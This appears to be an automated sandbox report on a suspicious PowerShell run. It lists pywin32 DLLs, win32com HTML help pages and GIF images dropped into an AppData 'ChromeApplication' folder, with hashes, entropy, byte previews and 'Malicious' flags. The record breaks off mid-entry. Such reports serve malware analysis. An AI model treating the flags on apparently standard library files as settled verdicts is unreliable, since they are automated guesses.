                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hU...;..;..;.q...;..|:..;..|>..;..|?..;..|8..;.K|:..;.-`:..;.b:..;..:...;.K|2..;.K|;..;.K|9..;.Rich..;.........PE..L......d...........!.....6...2.......6.......P............................................@.........................`c..P....c..........\...........................<\..T............................\..@............P...............................text....4.......6.................. ..`.rdata... ...P..."...:..............@..@.data................\..............@....rsrc...\............`..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32security.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):108544
                                                                                                                                                                                                  Entropy (8bit):6.438445241541499
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:p3ClLpapCHdaF8Pqx0W1pzKjeEeQF89MKYiDE3pEzhm3Uonm4jLhkVe:loapCc4KEJr3pEzhm3UomO3
                                                                                                                                                                                                  MD5:D91E4178E32527BDBF8A0775D2A50CDC
                                                                                                                                                                                                  SHA1:CA9F4084C385A24FE17E860B8E85F4B3E75F0BCE
                                                                                                                                                                                                  SHA-256:E8892E0CCD8A2DA86C0D5D913447890927A1CD2E875DCCD215A91AFA44822B3E
                                                                                                                                                                                                  SHA-512:A239958FD071B3CF8287FF71F936BABEA6A64C66322C613229EBC06DCA64BAA4EDAAB6B35F04A34BBC954F15CC6ADF7CF894DED70267AA183EC19A92DC41A633
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X....n.Q.n.Q.n.Q...Q.n.QN..P.n.QN..P.n.QN..P.n.QN..P.n.Q...P.n.Q...P.n.Q...P.n.Q.n.Q.n.Q...P.n.Q...P.n.Q...P.n.QRich.n.Q........PE..L......d...........!................P.....................................................@..........................j.......k..........l.......................0 ...^..T............................_..@............................................text............................... ..`.rdata..............................@..@.data................t..............@....rsrc...l...........................@..@.reloc..0 ......."..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32service.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):47616
                                                                                                                                                                                                  Entropy (8bit):6.226120159606489
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ep4SAninscjtoXG0p1m0kIqf1pTFpC4AmbLTkm6MoFNiq2BbfYTTyKx/NxzCRNa/:ep43nin/toXF1m0kZ9hvC4hkwugRBzIR
                                                                                                                                                                                                  MD5:8F11E6DB835B93DD4304BBCB1E0CF6D4
                                                                                                                                                                                                  SHA1:D1D931E49FD51EE5EE0249BCF5E1C837616A83B9
                                                                                                                                                                                                  SHA-256:92799E52E5D303B3D09DAB4203C0C7F635A9CB9964971C2732BE4BF7821DF370
                                                                                                                                                                                                  SHA-512:E8FCEFA15E3ED75E82A171B8F683021C6D6ACB678A72B7B259CBAABF5DF1BADBA18E90665CDD1CCE3A6D8566A101C2BFA3173760111F510E91AE2B2B97C87D72
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..Dnv..nv..nv..g...jv..<...lv..<...|v..<...dv..<...ov......lv......lv..z...iv..nv...v......ov......ov....v.ov......ov..Richnv..................PE..L......d...........!.....`...V.......[.......p............................................@.............................X...X...........(...........................\...T...............................@............p..L............................text...:_.......`.................. ..`.rdata...9...p...:...d..............@..@.data...............................@....rsrc...(...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32trace.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19456
                                                                                                                                                                                                  Entropy (8bit):5.704825572212408
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kie653E+NtR1+RGRkJR622VojN0zsz2OC1BjGK/wa7dGPDXA8C1BzT:uq3EMHcm+Rn2L1hUVPDpkBzT
                                                                                                                                                                                                  MD5:4A5DBBB8F6CA9F2E187A4F2414ED02EE
                                                                                                                                                                                                  SHA1:0C3EA68E7B18E838E04CCEFF4A3D04CDA835D3BF
                                                                                                                                                                                                  SHA-256:4ABA04E198269E6B096970EE81AAC404698DF71695DDCEF950DA8CD73FC64DA0
                                                                                                                                                                                                  SHA-512:C4305B4B4865FE6EA7FD3BD2F92BBCF8865D73224EF324038B62C3851717E87123FB106FBDB9FD345C74A0E3FEB643E1BE3EF333CC81370B5F7736963A5AD881
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T[.d.[.d.[.d.R..._.d...e.Y.d...a.P.d...`.Q.d...g.Z.d...e.Y.d...e.Y.d.O.e.^.d.[.e...d...m.Z.d...d.Z.d...f.Z.d.Rich[.d.................PE..L......d...........!.....&..."......H$.......@............................................@..........................J..T....J.......p..d............................E..T............................E..@............@..D............................text....$.......&.................. ..`.rdata..T....@.......*..............@..@.data........`.......>..............@....rsrc...d....p.......B..............@..@.reloc...............F..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32transaction.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15360
                                                                                                                                                                                                  Entropy (8bit):5.820565086156707
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:StKL6Y1n6oWyrNhOM0jy8lt5g/N4zeCk:StKLv6o5Nh78n5g/+zeC
                                                                                                                                                                                                  MD5:1635FD2F9333979AC981FE607C040A92
                                                                                                                                                                                                  SHA1:13D78B2A0BDA5CDD5B46EA26223724A5AFEF8650
                                                                                                                                                                                                  SHA-256:487F106104C8C3D6AF1BBAF4764CE6D0868F072B356FDD3FE42A34BF2557066F
                                                                                                                                                                                                  SHA-512:BFD1262037E3C8B2FE87EBE66ABF4819338304F5FA59A095635D6D310172BB7902C9C6668D2C590158D2CE3603AFDB97E50F107E3027919C43BE6AC702E83153
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$7.OEY.OEY.OEY.F=..MEY..0X.MEY..0\.DEY..0].EEY..0Z.NEY.0X.MEY..,X.MEY.[.X.LEY.OEX.yEY.0P.NEY.0Y.NEY.0[.NEY.RichOEY.........PE..L......d...........!.........................0............................................@.........................`9..`....9..x....`..|....................p.......4..T............................4..@............0...............................text............................... ..`.rdata..*....0....... ..............@..@.data........P.......2..............@....rsrc...|....`.......4..............@..@.reloc.......p.......8..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32ts.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26624
                                                                                                                                                                                                  Entropy (8bit):5.935874097640807
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Gnh5ai4mw0nvwlsXwVjxxtQJYDJABvEY:Gh5ai4mw4vwlKij3WJyJABvE
                                                                                                                                                                                                  MD5:D6338039E0A5AF896A0C5E5FF3A4A2C9
                                                                                                                                                                                                  SHA1:CC19C3A663FF8304D1EAB97FC27ECDD15BBD7076
                                                                                                                                                                                                  SHA-256:141B3CE8E4B816D60DBAAE6FF2DC9BD4B8F7F2712C872C0DA2B8BE1760A64E99
                                                                                                                                                                                                  SHA-512:A12508AB6CC64F4C0931A8EF134EFCA6049E128CF8FEFE04407DED6144B51524B8AA9ED094EC69AA973B6871571FE14AFDA3135E488285EEAEC856B7352B7792
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.\`.M\`.M\`.MU..MX`.M...L^`.M...LL`.M...LV`.M...L]`.M...L^`.M...L^`.MH..LY`.M\`.M.`.M...L]`.M...L]`.M...L]`.MRich\`.M........PE..L......d...........!.........6......{*.......@............................................@..........................Y..P....Z..........T............................Q..T............................R..@............@..d............................text...!,.......................... ..`.rdata...$...@...&...2..............@..@.data........p.......X..............@....rsrc...T............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\win32wnet.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31232
                                                                                                                                                                                                  Entropy (8bit):6.140886415820034
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:/3AZllOg3LVbD5wwqztB3hLJrb7kuIL32vO/3DWVDfPDtDE2T:PAZllOg3LVbDCwGjhh763J3DWjDE2T
                                                                                                                                                                                                  MD5:57E2AD12804A07A4FBBB3E9B34FD19BE
                                                                                                                                                                                                  SHA1:FAF7054F7E2E37093904F81B559AA47B993B529B
                                                                                                                                                                                                  SHA-256:673E8D2214CD84E0B4A47EE62D06C671B2EAE1039BBA58BF3FB45C64243E4CF7
                                                                                                                                                                                                  SHA-512:90F4C7E089B60F14065661A55BEB52E3730177C8AE2A50B44F2C3FA3184D30439BBC98D9E539DB5FC50A992E96642E9E81C00B94FFD2FA12D3B4E046FC598AA9
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^.....s...s...s.......s.H.r...s.H.v...s.H.w...s.H.p...s..r...s..r...s...r...s...r.s.s..z...s..s...s..q...s.Rich..s.........PE..L......d...........!.....>...8....../=.......P............................................@.........................pc..$....h..........\............................Z..T...........................XZ..@............P...............................text...a=.......>.................. ..`.rdata...%...P...&...B..............@..@.data...8............h..............@....rsrc...\............n..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\winxpgui.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):475136
                                                                                                                                                                                                  Entropy (8bit):6.688488191941263
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:hfSmnhXLHqKUf812AHz2sQj9nEiyWTZKtdmhDudlnp8:hfDZ12nEixadmhcp8
                                                                                                                                                                                                  MD5:A6841A996EF39A08936F0D637F48F280
                                                                                                                                                                                                  SHA1:F91FD0017B48A213EA14AC8C3BF466E5E95AD47A
                                                                                                                                                                                                  SHA-256:2DE800AB4A7CAC38735F02668606CC9E195F4D62D124A827C12DD616C00EDD50
                                                                                                                                                                                                  SHA-512:D733EB0CDD1E9B185F023350CDABEB643B020A88FA6472D5CA40B72473DCA6C4C8A691B1547DED65C006300B9AEC610E789E5F128BA054EB001BE8AAC110BA37
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............w.......w..-....w.......i.......i.......i......gi.......u.......w..........z...gi......gi......giy.....gi......Rich............PE..L......d...........!................9.....................................................@.........................0...h............... .................... ...X...x..T...........................hx..@............................................text.............................. ..`.rdata..4...........................@..@.data....9.......(..................@....rsrc... ...........................@..@.reloc...X... ...Z..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\GeneratedSupport.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (356)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6023
                                                                                                                                                                                                  Entropy (8bit):5.141945961023215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:FOUCy+dyPeIvppsLiROvxB8eh14lYlag3q4rh8tv95t3rV1dgl0bKrR9vJzgXbrH:F7NRNUvx5f3xIBZgy+Bv6
                                                                                                                                                                                                  MD5:FD24CECB6A39EEF94A51736E7C680267
                                                                                                                                                                                                  SHA1:A9CE24469E68F0EAEFAD39D4F8C85C189CC774AB
                                                                                                                                                                                                  SHA-256:919F4E71BEE798C889BBBA1E5C99A921D914468BE94C137958EF6279B8D3E2C5
                                                                                                                                                                                                  SHA-512:BC3BBB2D34FC14F1C759288615461B67D8512D922F7503A3B2492865F59E5A5C7BED300EE7314BB832578A00A41F461E96FFF74C0262F4A70AB414516A666B8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Generated Python COM Support</TITLE>.<META NAME="Version" CONTENT="8.0.3410">.<META NAME="Date" CONTENT="10/11/96">.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY TEXT="#000000" LINK="#0000ff" VLINK="#800080" BGCOLOR="#ffffff">..<P><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99 ALT="Python and COM - Blowing the others away"></P>.<H1>Generated Python COM Support</H1>.<P>This file describes how the Python COM extensions support "generated files". The information contained here is for expert Python users, and people who need to take advantage of the advanced features of the support. More general information is available in the <A HREF="QuickStartClientCom.html">Quick Start to Client Side COM</A> documentation.</P>.<H2>Introduction</H2>.<P>Generated Python COM support means that a .py fi

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\PythonCOM.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (556)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8943
                                                                                                                                                                                                  Entropy (8bit):5.029939122684919
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:FLTFg3D5o1lY/xlBfP+xWwXRiFBbrNkffE5kcKegAAjjTFngwRij:FLK5TxPX+xfXeZ5kjbFgwRij
                                                                                                                                                                                                  MD5:1F198ED21E89B00526F483A1D3B329F6
                                                                                                                                                                                                  SHA1:562A9E37ED831EC7F82664EC5B7D4D78537B1EB5
                                                                                                                                                                                                  SHA-256:9CE1633803532997EBE2C305251BC336549E1933D6891F223D148DB6789D54C8
                                                                                                                                                                                                  SHA-512:6BD0CAEC360A53E269656AE5080479B8C1156AA5D1C4CE49F7C63AF46812549BF6C5B9715B6D20C845B4B8476EDEA82538084EFC57F2138B2F960CC5AB8C88EC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Untitled</TITLE>.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY LINK="#0000ff" VLINK="#800080">..<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99 ALT="Python and COM - Blowing the others away"></H1>.<H1>Python and COM - Implementation Details </H1>.<H2>Introduction </H2>.<P>This document describes the technical implementation of the COM support in Python. It is primarily concerned with the underlying C++ interface to COM, although general Python issues are touched. </P>.<P>This document is targeted at people who wish to maintain/enhance the standard COM support (typically by writing extension modules). For information on using Python and COM from a Python programmers perspective, please see the <A HREF="docindex.html">documentation index</A>. </P>.<H2>General COM Support. </H2>.<P>

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\QuickStartClientCom.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (505)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7310
                                                                                                                                                                                                  Entropy (8bit):5.149206670607386
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:FOQr7O+AIK3nhYAKmXcqLOLsuvQ5ccjaTzq7ZFoB/i/HOpDxBBVTD3V8V9m/ZyEa:F3AxM3LsuQJUy23BVfpMrvu1Tkokz1KM
                                                                                                                                                                                                  MD5:1B85ED38D4A491D7E468528CAE1FE611
                                                                                                                                                                                                  SHA1:07912237ABB430132AD552ED5E275D325380E891
                                                                                                                                                                                                  SHA-256:0E27E580F4C57FACCFEEEB3C11B308908962CCBF4192A3E10EF98133B3D3B9EE
                                                                                                                                                                                                  SHA-512:D25E2E3E701D9B3870D8CD217ED980846D8D2C0547CF5A62C7B94DD2A72B510626D0A9F9A4311C350FD1F6CAE39C3BA00F098B68DFAE58493392D936DB290B73
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Quick Start to Client side COM and Python</TITLE>.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY LINK="#0000ff" VLINK="#800080">..<H1>Quick Start to Client side COM and Python</H1>.<H2>Introduction</H2>.<P>This documents how to quickly start using COM from Python. It is not a thorough discussion of the COM system, or of the concepts introduced by COM.</P>.<P>Other good information on COM can be found in various conference tutorials - please see <A HREF="http://starship.python.net/crew/mhammond/conferences">the collection of Mark's conference tutorials</A></P>.<P>For information on implementing COM objects using Python, please see <A HREF="http://www.python.org/windows/win32com/QuickStartServerCom.html">a Quick Start to Server side COM and Python</A></P>.<P>In this document we discuss the fol

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\QuickStartServerCom.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Non-ISO extended-ASCII text executable, with very long lines (460), with LF, NEL line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12940
                                                                                                                                                                                                  Entropy (8bit):5.268166600203537
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:FrCbe0OjqnbmeOg6nxKUuMj20I0w9xPogZH4QrSfj:NCa0OjObmeOjnxKcaV0wvPogZTk
                                                                                                                                                                                                  MD5:0FBD02CEA181792B4D1022BAC6E124B5
                                                                                                                                                                                                  SHA1:E6D92BE21FE8EC0E61F4150C2CE895C992DE4073
                                                                                                                                                                                                  SHA-256:4E4C394381C6F55E983136D78946CEA89A0B2D051A51B009447DE7C08F8BA0F4
                                                                                                                                                                                                  SHA-512:05CE7ECB0C79E0270888435E238400344973C318521A909FA7E13BF1E2F8646501F2324BF0F3EDF527ABE5CB394633EB739F901BB497B2D65EE2863E3B77B0FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>Quick Start to Server Side COM and Python</TITLE>.<META NAME="Version" CONTENT="8.0.3410">.<META NAME="Date" CONTENT="10/11/96">.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY TEXT="#000000" LINK="#0000ff" VLINK="#800080" BGCOLOR="#ffffff">..<H1>Quick Start to Server side COM and Python</H1>.<H2>Introduction</H2>.<P>This documents how to quickly start implementing COM objects in Python. It is not a thorough discussion of the COM system, or of the concepts introduced by COM.</P>.<P>For more details information on Python and COM, please see the <A HREF="http://www.python.org/windows/win32com/COMTutorial/index.htm">COM Tutorial given by Greg Stein and Mark Hammond at SPAM 6 (HTML format)</A> or download the same tutorial <A HREF="http://www.python.org/windows/win32com/COMTutorial.ppt">in PowerP

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\docindex.html

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:HTML document, Non-ISO extended-ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                  Entropy (8bit):5.464523146156943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:FIxxlbRl1L+2EEIi9wrqrTR7yhTtTROw5d1pW8Ay9YDeoMd090Py6SVGAJUp5JZ6:FIPfy54rdKtdVTWJy9YCo4a0q6SVGAJ9
                                                                                                                                                                                                  MD5:FAA3361E94FAE7E7E8E0F5E37A395D8F
                                                                                                                                                                                                  SHA1:D28D5D68746F8BB8A0E9D420907497A9F27C59B2
                                                                                                                                                                                                  SHA-256:49C8FF69C2FB9F4C3D5A191DEECDD7C7CBB4230B7BD692B7E0AF37CA9B142035
                                                                                                                                                                                                  SHA-512:8B5C9A10C4E162D982D6DA2C7E3FEB630DCC5E69EADEAA465F937D8EDD23C6B7359913A444A8D1B90EE47CD4743077599E28419DC6BB539667B70A5E70B8AA97
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<HTML>.<HEAD>.<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">.<META NAME="Generator" CONTENT="Microsoft Word 97">.<TITLE>win32com Documentation Index</TITLE>.<META NAME="Template" CONTENT="D:\Program Files\Microsoft Office\Office\html.dot">.</HEAD>.<BODY LINK="#0000ff" VLINK="#800080">..<H1><IMG SRC="image/pycom_blowing.gif" WIDTH=549 HEIGHT=99 ALT="Python and COM - Blowing the others away"></H1>.<H1>PythonCOM Documentation Index</H1>.<P>The following documentation is available</P>.<P><A HREF="QuickStartClientCom.html">A Quick Start to Client Side COM</A> (including makepy)</P>.<P><A HREF="QuickStartServerCom.html">A Quick Start to Server Side COM</A></P>.<P><A HREF="GeneratedSupport.html">Information on generated Python files (ie, what makepy generates)</A></P>.<P><A HREF="variant.html">An advanced VARIANT object which can give more control over parameter types</A></P>.<P><A HREF="package.html">A brief description of the win32com package structure</A></P>.<P

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\BTN_HomePage.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 74 x 19
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):211
                                                                                                                                                                                                  Entropy (8bit):6.522475016473021
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:CHp3zX9ylAxsllmnVzjkn9PZJfuUqHKWcKDKbcZqKeaHFiHTemn81xVEZOinEn:EZBqlkQn9PrGB5pDKWqKF0k/sE
                                                                                                                                                                                                  MD5:0CE97BF499A41C98EB3C906134B1ADD5
                                                                                                                                                                                                  SHA1:9AC0C92028F6C71AAB9088F458F83C8752190CA3
                                                                                                                                                                                                  SHA-256:9D357B65088DEB1D5F15C58AB788C78F75AC2338EFD385E326B09BA91A522019
                                                                                                                                                                                                  SHA-512:D86EC4D0B6A323B128D61552E6CD5EFCA08F5BF181E5EEAA7E6C1B10801FAABA396DED259C0FB16B2DB6C4544E21ACAB486FFA2716A680D6E2922CF8CD6F2E3C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89aJ............DDD...............!.......,....J...@......0.....f.......u..B.^...tm.x..|...jG.:.d..B.f...&.Y.XVUi.r>....A"..T.XN.iR.k....~....Q[x.Yt..b...{C."kV..:.ofJm]lk..:Bs.#.].+.n..q..>........P..;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\BTN_ManualTop.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 74 x 19
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):215
                                                                                                                                                                                                  Entropy (8bit):6.39955977370264
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:CHp3zX9ylAxsllmVbFLGczcWXYz6dJYTWSCSVyuy2QNoSqHoDi/RZJPi6/lCEl9I:EZBqlYpGczcnz2uTW5uy2QzE2GiUb9I
                                                                                                                                                                                                  MD5:7AC1AFE880954A970C26A740B963EDF9
                                                                                                                                                                                                  SHA1:72797DADE030DE020524CED49ECA8A2BBF7CE9B2
                                                                                                                                                                                                  SHA-256:2F056EFC29641031B5C61541882032F8E2E2F7E649E812083630328B647B8C9E
                                                                                                                                                                                                  SHA-512:19C043F2B1893142988B77C8FEDEAD705ED392A179B5910727E1482D62C89D5553470D8D613A468E121DE3A17C64021263E825F4DD8AABD5B1E4A2E18257CB4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89aJ............DDD...............!.......,....J...@......0..........r..^`G...-..tm.x-.y......3.J..H5Z.Q..IH.Ny...WD..?.J.euOO.h.D...iuh..q.|......vx.eg..Y...A/3.Rd@``>t.vlOp%h..HDV0._..J...y.}u.Z.\..........;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\BTN_NextPage.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 71 x 19
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):218
                                                                                                                                                                                                  Entropy (8bit):6.539715071136322
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:qkZBvuEbAXjyc87KE6yqtrHhdRqRkXKh1Lt3:qkZBGyWyc87KZyqKkah1Lt3
                                                                                                                                                                                                  MD5:074C43F4CFCC9C9E59286DA6C999E5FA
                                                                                                                                                                                                  SHA1:AF39B05CB186B5EB5BCC657C2EDF2E6F344BA724
                                                                                                                                                                                                  SHA-256:8469D1EA3649111314B2776E5473F80259EDAE481E85C1690F27E1238C6F8F89
                                                                                                                                                                                                  SHA-512:149E2CDFEA6BF47A7A25C95B866986D1456D14779AD4D1DB2DA1762419D700D81FE4D30B6BF6901FE571BB2BBE17AFE6C4C1B78B45F0415E32CFC48EE76DD37B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:GIF89aG............DDD...............!.......,....G...@......0..v..w...Y....aB....tm.x..z..;..vR.......\.!pJ.IWMeM.jVw....../.Y..Y.]...K...O.~......st.tc..>...ab.X.:i%_p.[!....hnhl.o...l..g.d%.Z,Pr.T.0x...8......;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\HTML\image\BTN_PrevPage.gif

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 71 x 19
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):216
                                                                                                                                                                                                  Entropy (8bit):6.5526864078200795
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:qkZBvuav+BZdRcPoAirUU3b3k5epIhtWhug9cWe:qkZBGplcPoAirUam2IhtGe
                                                                                                                                                                                                  MD5:E85741E446D5B5342E91664D8811D655
                                                                                                                                                                                                  SHA1:D4C271F764818D74F8C9BE264B4E57F871D8BC37
